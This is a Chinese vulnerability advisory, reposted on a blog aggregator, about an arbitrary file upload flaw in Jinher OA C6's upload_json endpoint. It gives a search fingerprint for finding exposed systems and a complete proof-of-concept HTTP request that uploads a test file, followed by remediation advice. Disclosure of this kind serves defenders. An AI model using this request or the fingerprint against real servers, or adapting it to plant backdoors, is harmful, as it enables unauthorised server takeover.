金和OA C6 upload_json 任意文件上传漏洞
2024-01-09 16:07:11
产品介绍
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。
漏洞概述
金和 OA C6 upload_json接口处存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。
资产测绘
app=“Jinher-OA”
漏洞复现
POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 369
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------494407267900182071383631703039
-----------------------------494407267900182071383631703039
Content-Disposition: form-data; name="localUrl"
-----------------------------494407267900182071383631703039
Content-Disposition: form-data; name="imgFile"; filename="vae.txt"
Content-Type: image/png
vae
-----------------------------494407267900182071383631703039--
访问打码的路径,访问上传文件
成功上传,借此可以上传任意文件。
修复建议
1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。
文章来源:https://blog.csdn.net/qq_36618918/article/details/135480731
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!